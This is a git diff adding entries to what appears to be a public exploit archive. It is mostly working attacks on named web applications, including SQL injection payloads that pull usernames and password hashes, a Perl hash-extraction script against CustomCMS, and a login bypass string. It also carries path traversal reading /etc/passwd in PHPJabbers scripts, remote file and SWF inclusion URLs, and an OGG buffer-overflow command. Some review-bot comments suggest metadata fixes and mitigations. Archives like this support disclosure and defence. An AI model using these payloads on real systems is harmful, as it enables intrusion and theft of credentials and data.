diff --git a/files.csv b/files.csv
index 3557ae6ae..4a2c2e931 100755
--- a/files.csv
+++ b/files.csv
@@ -27705,6 +27705,7 @@ id,file,description,date,author,platform,type,port
 30862,platforms/php/webapps/30862.txt,"E-Xoops 1.0.5/1.0.8 adresses/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
 30863,platforms/php/webapps/30863.txt,"E-Xoops 1.0.5/1.0.8 mydownloads/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
 30864,platforms/php/webapps/30864.txt,"E-Xoops 1.0.5/1.0.8 mysections/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
+30872,platforms/php/webapps/30872.txt,"DomPHP <= v0.83 - SQL Injection Vulnerability",2014-01-13,Houssamix,php,webapps,0
 30873,platforms/php/webapps/30873.txt,"E-Xoops 1.0.5/1.0.8 myalbum/ratephoto.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
 30874,platforms/php/webapps/30874.txt,"E-Xoops 1.0.5/1.0.8 modules/banners/click.php bid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
 30875,platforms/php/webapps/30875.txt,"E-Xoops 1.0.5/1.0.8 modules/arcade/index.php gid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
@@ -27770,3 +27771,30 @@ id,file,description,date,author,platform,type,port
 30940,platforms/asp/webapps/30940.txt,"IPortalX forum/login_user.asp Multiple Parameter XSS",2007-12-27,Doz,asp,webapps,0
 30941,platforms/asp/webapps/30941.txt,"IPortalX blogs.asp Date Parameter XSS",2007-12-27,Doz,asp,webapps,0
 30942,platforms/linux/dos/30942.c,"Extended Module Player (xmp) 2.5.1 'oxm.c' And 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",linux,dos,0
+30945,platforms/php/webapps/30945.txt,"NetBizCity FaqMasterFlexPlus 'faq.php' Cross-Site Scripting Vulnerability",2007-12-28,"Juan Galiana Lara",php,webapps,0
+30946,platforms/php/webapps/30946.txt,"Collabtive 1.1 (managetimetracker.php, id param) - SQL Injection",2014-01-15,"Yogesh Phadtare",php,webapps,80
+30947,platforms/php/webapps/30947.txt,"NetBizCity FaqMasterFlexPlus 'faq.php' SQL Injection Vulnerability",2007-12-28,"Juan Galiana Lara",php,webapps,0
+30948,platforms/php/webapps/30948.txt,"OpenBiblio 0.x staff_del_confirm.php Multiple Parameter XSS",2007-12-28,"Juan Galiana Lara",php,webapps,0
+30949,platforms/php/webapps/30949.txt,"OpenBiblio 0.x theme_del_confirm.php name Parameter XSS",2007-12-28,"Juan Galiana Lara",php,webapps,0
+30950,platforms/php/webapps/30950.html,"PHPJabbers Pet Listing Script 1.0 - Multiple Vulnerabilities",2014-01-15,"HackXBack ",php,webapps,80
+30951,platforms/php/webapps/30951.html,"OpenBiblio 0.x theme_preview.php themeName Parameter XSS",2007-12-28,"Juan Galiana Lara",php,webapps,0
+30952,platforms/php/webapps/30952.html,"PHPJabbers Property Listing Script 2.0 - Add Admin CSRF Vulnerability",2014-01-15,"HackXBack ",php,webapps,80
+30953,platforms/php/webapps/30953.txt,"PHPJabbers Vacation Packages Listing 2.0 - Multiple Vulnerabilities",2014-01-15,"HackXBack ",php,webapps,80
+30954,platforms/php/webapps/30954.txt,"PHPJabbers Hotel Booking System 3.0 - Multiple Vulnerabilities",2014-01-15,"HackXBack ",php,webapps,80
+30955,platforms/php/webapps/30955.txt,"PHPJabbers Vacation Rental Script 3.0 - Multiple Vulnerabilities",2014-01-15,"HackXBack ",php,webapps,80
+30956,platforms/linux/dos/30956.txt,"CoolPlayer 217 'CPLI_ReadTag_OGG()' Buffer Overflow Vulnerability",2007-12-28,"Luigi Auriemma",linux,dos,0
+30957,platforms/php/webapps/30957.txt,"PHCDownload 1.1 search.php string Parameter SQL Injection",2007-12-29,Lostmon,php,webapps,0
+30958,platforms/php/webapps/30958.txt,"PHCDownload 1.1 search.php string Parameter XSS",2007-12-29,Lostmon,php,webapps,0
+30959,platforms/php/webapps/30959.txt,"Makale Scripti Cross-Site Scripting Vulnerability",2007-12-29,GeFORC3,php,webapps,0
+30960,platforms/php/webapps/30960.pl,"CustomCMS 3.1 'vars.php' SQL Injection Vulnerability",2007-12-29,Pr0metheuS,php,webapps,0
+30961,platforms/php/webapps/30961.txt,"MatPo.de Kontakt Formular 1.4 'function.php' Remote File Include Vulnerability",2007-12-30,bd0rk,php,webapps,0
+30962,platforms/php/webapps/30962.txt,"MilliScripts 'dir.php' Cross-Site Scripting Vulnerability",2007-12-31,"Jose Luis Gangora Fernandez",php,webapps,0
+30963,platforms/asp/webapps/30963.txt,"InstantSoftwares Dating Site Login SQL Injection Vulnerability",2007-12-31,"Aria-Security Team",asp,webapps,0
+30964,platforms/php/webapps/30964.txt,"LiveCart 1.0.1 user/remindPassword return Parameter XSS",2007-12-31,Doz,php,webapps,0
+30965,platforms/php/webapps/30965.txt,"LiveCart 1.0.1 category q Parameter XSS",2007-12-31,Doz,php,webapps,0
+30966,platforms/php/webapps/30966.txt,"LiveCart 1.0.1 order return Parameter XSS",2007-12-31,Doz,php,webapps,0
+30967,platforms/php/webapps/30967.txt,"LiveCart 1.0.1 user/remindComplete email Parameter XSS",2007-12-31,Doz,php,webapps,0
+30968,platforms/php/webapps/30968.txt,"MODx 0.9.6.1 'htcmime.php' Source Code Information Disclosure Vulnerability",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0
+30969,platforms/php/webapps/30969.txt,"MODx 0.9.6.1 'AjaxSearch.php' Local File Include Vulnerability",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0
+30972,platforms/multiple/remote/30972.txt,"Camtasia Studio 4.0.2 'csPreloader' Remote Code Execution Vulnerability",2008-01-02,"Rich Cannings",multiple,remote,0
+30973,platforms/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 SWF Flash File Remote Code Execution Vulnerability",2008-01-02,"Rich Cannings",multiple,remote,0
diff --git a/platforms/asp/webapps/30963.txt b/platforms/asp/webapps/30963.txt
new file mode 100755
index 000000000..a54047458
--- /dev/null
+++ b/platforms/asp/webapps/30963.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/27080/info
+
+InstantSoftwares Dating Site is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The following proof of concept is available:
+
+Username: Admin
+Password: anything' OR 'x'='x
\ No newline at end of file
diff --git a/platforms/linux/dos/30956.txt b/platforms/linux/dos/30956.txt
new file mode 100755
index 000000000..f9126bd75
--- /dev/null
+++ b/platforms/linux/dos/30956.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/27061/info
+
+CoolPlayer is prone a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
+
+The issue occurs when handling specially crafted OGG files.
+
+Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts likely result in denial-of-service conditions.
+
+CoolPlayer 217 is vulnerable; other versions may also be affected.
+
+vorbiscomment -t cTag=AAA_2500_A's_AAA -a input.ogg output.ogg
\ No newline at end of file
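Review bot: The author field in the five added PHPJabbers rows (30950, 30952, 30953, 30954, 30955) is `"HackXBack "` with a trailing space inside the quotes, so exact-match author lookups or grouping over files.csv will not line these rows up with any row that spells the name `HackXBack`; write the field as `HackXBack`. These rows and 30946 also carry port `80`, while every other webapps row added in this hunk uses `0`; which convention the index follows is not visible here and should be confirmed.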
diff --git a/platforms/multiple/remote/30972.txt b/platforms/multiple/remote/30972.txt
new file mode 100755
index 000000000..71f746fc9
--- /dev/null
+++ b/platforms/multiple/remote/30972.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27107/info
+
+Camtasia Studio is prone to a remote code-execution vulnerability because the application fails to properly sanitize user-supplied input.
+
+A successful exploit will allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+NOTE: This vulnerability was initially considered a cross-site scripting issue, but further analysis reveals that this is a remote code-execution vulnerability.
+
+http://www.example.com/Example_controller.swf?csPreloader=http://www.example2.com/DoKnowEvil.swf%3f
\ No newline at end of file
diff --git a/platforms/multiple/remote/30973.txt b/platforms/multiple/remote/30973.txt
new file mode 100755
index 000000000..1453cf534
--- /dev/null
+++ b/platforms/multiple/remote/30973.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27109/info
+
+InfoSoft FusionCharts is prone to a remote code-execution vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to execute malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
+
+http://www.example.com/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//www.example2.com/DoKnowEvil.swf%3F.jpg%22%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/30872.txt b/platforms/php/webapps/30872.txt
new file mode 100755
index 000000000..a6114ec34
--- /dev/null
+++ b/platforms/php/webapps/30872.txt
@@ -0,0 +1,20 @@ +------------------------------------------------------------- +DomPHP <= v0.83 SQL Injection Vulnerability +------------------------------------------------------------- + += Author : Houssamix += Script : DomPHP <= v0.83 + += Download : http://www.domphp.com/download/ + += BUG : SQL Injection Vulnerability + += DORK : Site créé à l'aide du CMS DomPHP v0.83 + += Exploit : +http://[target]/agenda/indexdate.php?ids=77 [SQL] + +Exemple : + +http://site.com/domphp/agenda/indexdate.php?ids=77 UNION SELECT 1,2,3,loginUtilisateur,5,6,passUtilisateur,8,9,10,11,12,13,14,15 from domphp_utilisateurs-- + diff --git a/platforms/php/webapps/30912.txt b/platforms/php/webapps/30912.txt index c6a6f56b1..09eeb773d 100755 --- a/platforms/php/webapps/30912.txt +++ b/platforms/php/webapps/30912.txt @@ -6,8 +6,6 @@ Car Rental Script - Multiple Vulnerabilities .:. Contact : h-b@usa.com .:. Home : http://www.iphobos.com/blog/ .:. Script : http://www.phpjabbers.com/car-rental/ -.:. Tested On Demo : -http://www.phpjabbers.com/demo/cr_11/index.php?controller=Admin&action=login #################################################################### ===[ Exploit ]=== diff --git a/platforms/php/webapps/30945.txt b/platforms/php/webapps/30945.txt new file mode 100755 index 000000000..d02abb7e5 --- /dev/null +++ b/platforms/php/webapps/30945.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27051/info + +FaqMasterFlexPlus is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +All versions of FaqMasterFlexPlus are considered vulnerable. + +http://www.example.com/[path/to/faq/]/faq.php?category_id=1&cat_name=[XSS] \ No newline at end of file 
diff --git a/platforms/php/webapps/30946.txt b/platforms/php/webapps/30946.txt new file mode 100755 index 000000000..f5d580c71 --- /dev/null +++ b/platforms/php/webapps/30946.txt 
@@ -0,0 +1,79 @@ +##=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+## +|| || +|| Advisory : Collabtive Sql Injection || +|| Affected Version : 1.1 || +|| Vendor : http://collabtive.o-dyn.de/index.php || +|| Risk : Medium || +|| CVE-ID : 2013-6872 || +|| Tested on Platform : Windows 7 || +##=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+## + +========================================================================================================== + +Product Description: + + +Collabtive is web-based project management software. +The project was started in November 2007. It is open source software and provides an alternative to proprietary tools like Basecamp. Collabtive is written in PHP and JavaScript. + +Collabtive is intended for small to medium-sized businesses and freelancers. We offer commercial services for installation and customization of Collabtive. +It can also be installed on an internal server as well as in the cloud. All major browsers like Internet Explorer, Firefox, Chrome and Safari are supported. + +Collabtive is developed by a team of professional volunteers. Everyone involved is a pro in their respective areas, providing high quality contributions to the project. + +(from product home page) + +Collabtive has more than 1000 downloads per week. +========================================================================================================== + +Vulnerability Description: + +Double query type of SQL Injection vulnerability has been detected in Collabtive web applivation. Application failed to sanitize user supplied input in parameter "id" of page managetimetracker.php. + +User must be authenticated to exploit this vulnerability. + +This vulnerability was tested with Collabtive 1.1. Other versions may also be affected. 
+ +=========================================================================================================== + +Impact: + +Successful exploitation of this vulnerability will allow a remote authenticated attacker to extract sensitive and confidential data from the database. + +=========================================================================================================== + +Proof of Concept: + +URL: http://www.example.com/collabtive/managetimetracker.php?action=projectpdf&id=2 + +PAYLOAD: and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 + +Example: + +Following query will show name of first database in error. + +http://www.example.com/collabtive/managetimetracker.php?action=projectpdf&id=2 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 + +=========================================================================================================== + +Solution: + +There's no known workaround available. + +This vulnerability has been fixed in version 1.2 of Collabtive. + +=========================================================================================================== + +Disclosure Timeline: +~Vendor notification: 26th November 2013 +~Vendor response: 27th November 2013 +~Vendor released updates: 4th January 2014 +~Public disclosure: 15th January 2014 +=========================================================================================================== + +Advisory discovered by: Yogesh Phadtare + Secur-I Research Group + http://securview.com/ + + + 
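Review bot: The advisory header writes the identifier as `CVE-ID : 2013-6872` without the `CVE-` prefix, so a search of the archive for `CVE-2013-6872` will not match this file, and the new files.csv row for 30946 carries no CVE either. Writing it as `CVE-2013-6872`, the form 30908.txt uses in this same commit (`# CVE : CVE-2014-1202`), keeps the entry findable for anyone triaging by CVE. The `Solution:` section already names version 1.2 as the fixed release, so the identifier is the only piece a defender needs to map this entry to their inventory.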
diff --git a/platforms/php/webapps/30947.txt b/platforms/php/webapps/30947.txt
new file mode 100755
index 000000000..b617d873b
--- /dev/null
+++ b/platforms/php/webapps/30947.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/27052/info
+
+FaqMasterFlexPlus is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+All versions of FaqMasterFlexPlus are considered vulnerable.
+
+http://www.example.com/[path/to/faq]/faq.php?category_id=1'%20union%20select%201,1,user(),1/*
+http://www.example.com/[path/to/faq]/faq.php?category_id=1'%20union%20select%201,1,passwrd,1%20from%20users%20where%20userid='admin
\ No newline at end of file
diff --git a/platforms/php/webapps/30948.txt b/platforms/php/webapps/30948.txt
new file mode 100755
index 000000000..7e8ef6ef6
--- /dev/null
+++ b/platforms/php/webapps/30948.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27053/info
+
+OpenBiblio is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include SQL-injection, cross-site scripting, HTML-injection, and local file-include vulnerabilities.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, execute arbitrary local scripts, retrieve potentially sensitive information, or exploit latent vulnerabilities in the underlying database.
+
+These issues affect Openbiblio 0.5.2-pre4 and prior versions.
+
+http://www.example.com/openbiblio/admin/staff_del_confirm.php?UID=1&LAST=[XSS]&FIRST=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/30949.txt b/platforms/php/webapps/30949.txt
new file mode 100755
index 000000000..a2608803c
--- /dev/null +++ b/platforms/php/webapps/30949.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27053/info + +OpenBiblio is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include SQL-injection, cross-site scripting, HTML-injection, and local file-include vulnerabilities. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, execute arbitrary local scripts, retrieve potentially sensitive information, or exploit latent vulnerabilities in the underlying database. + +These issues affect Openbiblio 0.5.2-pre4 and prior versions. + +http://www.example.com/openbiblio/admin/theme_del_confirm.php?themeid=6&name=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/30950.html b/platforms/php/webapps/30950.html new file mode 100755 index 000000000..bf87f3e2c --- /dev/null +++ b/platforms/php/webapps/30950.html @@ -0,0 +1,75 @@ +Pet Listing Script V1.0 - Multiple Vulnerabilities +==================================================================== + +#################################################################### +.:. Author : HackXBack +.:. Contact : h-b@usa.com +.:. Home : http://www.iphobos.com/blog/ +.:. Script : http://www.phpjabbers.com/pet-listing-script/ +#################################################################### + +===[ Exploit ]=== + +[1] Cross Site Request Forgery +============================== + +[Add Admin] + + + +
+ + + + + +
+ + + +[2] Multiple Cross Site Scripting +================================== + +# CSRF with XSS Exploit: + +I. Xss In Type + + + +
+ + +
+ + + +II. Xss In Breed + + + +
+ + + +
+ + + +III. Xss In Extra + + + +
+ + +
+ + +#################################################################### diff --git a/platforms/php/webapps/30951.html b/platforms/php/webapps/30951.html new file mode 100755 index 000000000..3920ed358 --- /dev/null +++ b/platforms/php/webapps/30951.html @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/27053/info + +OpenBiblio is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include SQL-injection, cross-site scripting, HTML-injection, and local file-include vulnerabilities. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, execute arbitrary local scripts, retrieve potentially sensitive information, or exploit latent vulnerabilities in the underlying database. + +These issues affect Openbiblio 0.5.2-pre4 and prior versions. + +
+

+ +
diff --git a/platforms/php/webapps/30952.html b/platforms/php/webapps/30952.html new file mode 100755 index 000000000..4446ea8e3 --- /dev/null +++ b/platforms/php/webapps/30952.html @@ -0,0 +1,34 @@ +Property Listing Script V2.0 - Add Admin CSRF Vulnerability +==================================================================== + +#################################################################### +.:. Author : HackXBack +.:. Contact : h-b@usa.com +.:. Home : http://www.iphobos.com/blog/ +.:. Script : http://www.phpjabbers.com/property-listing-script/ +#################################################################### + +===[ Exploit ]=== + +Cross Site Request Forgery +========================== + +[Add Admin] + + + +
+ + + + + + + +
+ + + +#################################################################### diff --git a/platforms/php/webapps/30953.txt b/platforms/php/webapps/30953.txt new file mode 100755 index 000000000..0c5b717e7 --- /dev/null +++ b/platforms/php/webapps/30953.txt @@ -0,0 +1,93 @@ +Vacation Packages Listing V2.0 - Multiple Vulnerabilities +==================================================================== + +#################################################################### +.:. Author : HackXBack +.:. Contact : h-b@usa.com +.:. Home : http://www.iphobos.com/blog/ +.:. Script : http://www.phpjabbers.com/vacation-packages/ +#################################################################### + +===[ Exploit ]=== + +[1] Cross Site Request Forgery +============================== + +[Add Admin] + + + +
+ + + + + + + + + + + + +
+ + + +[2] Multiple Cross Site Scripting +================================== + +# CSRF with XSS Exploit: + +I. Xss In Types + + + +
+ + + + +
+ + + +II. Xss In Features + + + +
+ + + + +
+ + + +III. Xss In Countries + + + +
+ + + + +
+ + + +[3] Local File disclure +======================== + +http://site/index.php?controller=pjBackup&action=pjActionDownload&id=../../../../../../../../etc/passwd + +#################################################################### diff --git a/platforms/php/webapps/30954.txt b/platforms/php/webapps/30954.txt new file mode 100755 index 000000000..9aa9c3794 --- /dev/null +++ b/platforms/php/webapps/30954.txt @@ -0,0 +1,63 @@ +Hotel Booking System V3.0 - Multiple Vulnerabilties +==================================================================== + +#################################################################### +.:. Author : HackXBack +.:. Contact : h-b@usa.com +.:. Home : http://www.iphobos.com/blog/ +.:. Script : http://www.phpjabbers.com/hotels-booking-system/ +#################################################################### + +===[ Exploit ]=== + +[1] Cross Site Request Forgery +============================== + +[Add Admin] + + + +
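Review bot: Section [3] of this advisory, and the identical section in 30954.txt and 30955.txt, documents a path traversal through the `id` parameter of the `pjBackup` / `pjActionDownload` action but records no fixed version, vendor status or mitigation, unlike 30946.txt in this commit, which carries `Solution:` and `Disclosure Timeline:` sections. A reader triaging exposure cannot tell from the entry whether an update exists; a short `Solution:` line stating the vendor status known at publication would close that gap. For operators, the defensive reading is that the backup download action should be reachable only by authenticated administrators and should resolve `id` against the backup directory, rejecting any path that leaves it.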
+ + + + + + +
+ + + +
+ + + + + + + + + + +
+ + + + +[3] Local File disclure +======================== + +http://site/index.php?controller=pjBackup&action=pjActionDownload&id=../../../../../../../../etc/passwd + +#################################################################### diff --git a/platforms/php/webapps/30955.txt b/platforms/php/webapps/30955.txt new file mode 100755 index 000000000..b159b94bd --- /dev/null +++ b/platforms/php/webapps/30955.txt @@ -0,0 +1,89 @@ +Vacation Rental Script V3.0 - Multiple Vulnerabilties +==================================================================== + +#################################################################### +.:. Author : HackXBack +.:. Contact : h-b@usa.com +.:. Home : http://www.iphobos.com/blog/ +.:. Script : http://www.phpjabbers.com/vacation-rental-script/ +#################################################################### + +===[ Exploit ]=== + +[1] Cross Site Request Forgery +============================== + +[Add Admin] + + + +
+ + + + + + + +
+ + + +[2] Multiple Cross Site Scripting +================================== + +# CSRF with XSS Exploit: + +I. Xss In Types + + + +
+ + + + +
+ + + +II. Xss In Features + + + +
+ + + + +
+ + + +III. Xss In Countries + + + +
+ + + + +
+ + + + +[3] Local File disclure +======================== + +http://site/index.php?controller=pjBackup&action=pjActionDownload&id=../../../../../../../../etc/passwd + +#################################################################### diff --git a/platforms/php/webapps/30957.txt b/platforms/php/webapps/30957.txt new file mode 100755 index 000000000..30690466b --- /dev/null +++ b/platforms/php/webapps/30957.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27066/info + +PHCDownload is prone to an SQL-injection and cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Attackers may also exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +PHCDownload 1.1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/[phcdownload/search.php?string=' \ No newline at end of file diff --git a/platforms/php/webapps/30958.txt b/platforms/php/webapps/30958.txt new file mode 100755 index 000000000..1d412bfab --- /dev/null +++ b/platforms/php/webapps/30958.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27066/info + +PHCDownload is prone to an SQL-injection and cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Attackers may also exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +PHCDownload 1.1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/[phcdownload/search.php?string=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/30959.txt b/platforms/php/webapps/30959.txt new file mode 100755 index 000000000..481d42adc --- /dev/null +++ b/platforms/php/webapps/30959.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/27067/info + +Makale Scripti is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://site.com/script_path/Ara/?ara= "> \ No newline at end of file diff --git a/platforms/php/webapps/30960.pl b/platforms/php/webapps/30960.pl new file mode 100755 index 000000000..335241ee0 --- /dev/null +++ b/platforms/php/webapps/30960.pl 
@@ -0,0 +1,64 @@ +source: http://www.securityfocus.com/bid/27069/info + +CustomCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +CustomCMS 3.1 is vulnerable to this issue; other versions may also be affected. + +#!/usr/bin/perl +#Found by Pr0metheuS +#Coded by Pr0metheuS +#Gr33tz-Team +#Dork : intitle:"CCMS v3.1 Demo PW" +print "______________________________________\n"; +print "-=-=-=-=-=-=+-=-=-=-=-=-=-+-=-=-=-=-=|\n"; +print "-=-=-=-=-=-=+CCMS Exploit...+-=-=-=-=|\n"; +print "-=-=-=-=-=-=+Remote MD5 Hash+-=-=-=-=|\n"; +print "-=-=-=-=-=-=+By Pr0metheus..+-=-=-=-=|\n"; +print "-=-=-=-=-=-=+Gr33tz to :+-=-=-=-=|\n"; +print "-=-=-=-=-=-=+pawel2827, d3d!k, J4Z0, chez, fir3+-=-=-=-=|\n"; +print "______________________________________\n"; +print "[+] Enter SITE:\n"; +$SITE = ; +chomp $SITE; +print "[+] Enter PATH:\n"; +$PATH = ; +chomp $PATH; +print "[+] Enter USERID:\n"; +$USERID = ; +chomp $USERID; +print "______________________________________\n"; +#Send Request +use LWP::UserAgent; +$ua = new LWP::UserAgent; +$ua->agent("Mozilla/8.0"); +$ua = LWP::UserAgent->new; +my $req = HTTP::Request->new(GET => "$SITE$PATH/admin.php/vars.php?page=Console&p=1'+union+select+userid,2,3,PASSWORD+from+user+where+userid=$USERID/*"); +$req->header('Accept' => 'text/html'); +$res = $ua->request($req); +$con = $res->content; +#FIND MD5 IN TEXT REGEX !!! 
+if ($con =~ "/([0-9a-fA-F]{32})/") { +print "______________________________________\n"; +print "-=-=-=-=-=-=+-=-=-=-=-=-=-+-=-=-=-=-=|\n"; +print "-=-=-=-=-=-=+CCMS Exploit...+-=-=-=-=|\n"; +print "-=-=-=-=-=-=+Remote MD5 Hash+-=-=-=-=|\n"; +print "-=-=-=-=-=-=+By Pr0metheus..+-=-=-=-=|\n"; +print "-=-=-=-=-=-=+Gr33tz to :+-=-=-=-=|\n"; +print "-=-=-=-=-=-=+pawel2827, d3d!k, J4Z0, chez, fir3+-=-=-=-=|\n"; +print "[+] Exploit successful!\n"; +print "[+] USERID:$USERID\n"; +print "[+] MD5:$1\n"; +print "______________________________________\n"; +} +else{ +print "______________________________________\n"; +print "-=-=-=-=-=-=+-=-=-=-=-=-=-+-=-=-=-=-=|\n"; +print "-=-=-=-=-=-=+CCMS Exploit...+-=-=-=-=|\n"; +print "-=-=-=-=-=-=+Remote MD5 Hash+-=-=-=-=|\n"; +print "-=-=-=-=-=-=+By Pr0metheus..+-=-=-=-=|\n"; +print "-=-=-=-=-=-=+Gr33tz to :+-=-=-=-=|\n"; +print "-=-=-=-=-=-=+pawel2827, d3d!k, J4Z0, chez, fir3+-=-=-=-=|\n"; + print "[+] Exploit Failed!\n"; +} diff --git a/platforms/php/webapps/30961.txt b/platforms/php/webapps/30961.txt new file mode 100755 index 000000000..75002d493 --- /dev/null +++ b/platforms/php/webapps/30961.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27075/info + +Kontakt Formular is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. + +Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +This issue affects Kontakt Formular 1.4; other versions may be vulnerable as well. + +http://www.example.com/[path]/includes/function.php?root_path=[Shellcode] \ No newline at end of file diff --git a/platforms/php/webapps/30962.txt b/platforms/php/webapps/30962.txt new file mode 100755 index 000000000..dea2e67a6 --- /dev/null +++ b/platforms/php/webapps/30962.txt 
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27078/info
+
+MilliScripts is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/PATH/dir.php?do=browse&cat=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/30964.txt b/platforms/php/webapps/30964.txt
new file mode 100755
index 000000000..842b8796d
--- /dev/null
+++ b/platforms/php/webapps/30964.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27087/info
+
+LiveCart is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+LiveCart 1.0.1 is vulnerable to these issues; other versions may also be affected.
+
+http://www.example.com/user/remindPassword?return=XSS
\ No newline at end of file
diff --git a/platforms/php/webapps/30965.txt b/platforms/php/webapps/30965.txt
new file mode 100755
index 000000000..95dca522e
--- /dev/null
+++ b/platforms/php/webapps/30965.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27087/info
+
+LiveCart is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+LiveCart 1.0.1 is vulnerable to these issues; other versions may also be affected.
+
+http://www.example.com/category?id=1&q=XSS
\ No newline at end of file
diff --git a/platforms/php/webapps/30966.txt b/platforms/php/webapps/30966.txt
new file mode 100755
index 000000000..4868b6d76
--- /dev/null
+++ b/platforms/php/webapps/30966.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27087/info
+
+LiveCart is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+LiveCart 1.0.1 is vulnerable to these issues; other versions may also be affected.
+
+http://www.example.com/order?return=order/XSS
